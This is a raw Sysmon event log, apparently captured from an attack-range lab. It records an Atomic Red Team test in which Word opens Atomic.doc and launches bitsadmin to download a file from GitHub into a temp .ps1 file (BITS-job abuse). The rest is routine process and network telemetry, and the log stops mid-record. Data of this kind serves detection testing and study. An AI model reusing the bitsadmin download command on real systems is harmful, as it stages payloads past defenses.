12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C8-6088-262A-00000000BB01}4408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293274Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C8-6088-262A-00000000BB01}4408C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293273Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02C8-6088-262A-00000000BB01}4408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293272Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02C8-6088-262A-00000000BB01}4408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293271Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.539{BEA10069-02C8-6088-262A-00000000BB01}44086196C:\Windows\system32\conhost.exe{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293270Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.539{BEA10069-D4AB-6086-4301-00000000BB01}33844212C:\Windows\system32\csrss.exe{BEA10069-02C8-6088-262A-00000000BB01}4408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293269Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.539{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293268Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.539{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293267Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.539{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293266Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.539{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293265Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.539{BEA10069-D4AB-6086-4301-00000000BB01}33842040C:\Windows\system32\csrss.exe{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293264Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.539{BEA10069-02A1-6088-112A-00000000BB01}65686164C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL+100e92|UNKNOWN(00000145103363F2) 154100x8000000000000000293263Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.542{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exebitsadmin.exe /transfer /Download /priority Foreground url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %%temp%%\bitsadmin1_flag.ps1C:\Users\Administrator\Downloads\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Administrator\Downloads\Atomic.doc" /o "" 10341000x8000000000000000293262Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.538{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000293261Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.883{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-96.attackrange.local50662-false205.185.216.10map2.hwcdn.net80http 23542300x8000000000000000293260Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.336{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=335C5DE42AA787A72FA853A867B26BE9,SHA256=50AC788789D5C8644D113FAFAE72E7EA42BAFB1F8D447935AA6C5690DEE3FF60,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441541Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:41.360{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-932.attackrange.local62432-false205.185.216.10map2.hwcdn.net80http 10341000x8000000000000000441540Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:44.270{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441539Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:44.270{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441538Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:44.150{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=924F79F48214C7236D1E514C4CACBB6F,SHA256=B55D54C2B2E0B26641A9A65B2CC9C5170211F0DA1FD3AC0E7A9EA0C29BBB6143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293292Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:45.834{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC02911CF1C200DB9BE3C49CBDDCEB09,SHA256=40F08B085D453CEE1CC7C4F210FCDCD89D6D959CDF0BDA73BE2014A1AD0C8492,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293291Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:45.834{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D8170A51E29762EC3D4051101F5631A,SHA256=CD8B70CD1F73B5639E533E9D2EDFEBAA81B36ED7AEF83F2B79B96D2510C9F856,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441546Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:42.544{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62433-false10.0.1.12-8000- 23542300x8000000000000000441545Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:45.379{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89301D2DA7526E48F5041C7CD1D8F25C,SHA256=E1A5AB33C506BA57E28301AADC0A80B4BED2099B769359217ED4495D1FA79D96,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293290Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:42.414{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50663-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000441544Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:45.271{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441543Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:45.271{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441542Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:45.105{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0D5D8F903E452C6097F3D0CF92D2BBC,SHA256=D69BBDF3489C18B4329049F8B241B1C259220DEC76CB2941717F2DC6756D503E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293293Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:46.853{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD393919683FC279D01C10137ABC327,SHA256=9A7626DC2B51584FD01CCD8AEC5C1A7999AFFF378AE50CE17BE6C0FCB9184484,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441566Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.900{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-02CA-6088-D328-00000000BA01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441565Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.898{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441564Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.898{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441563Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.898{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441562Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.897{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441561Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.897{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-02CA-6088-D328-00000000BA01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441560Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.897{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-02CA-6088-D328-00000000BA01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441559Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.897{42DC5269-02CA-6088-D328-00000000BA01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 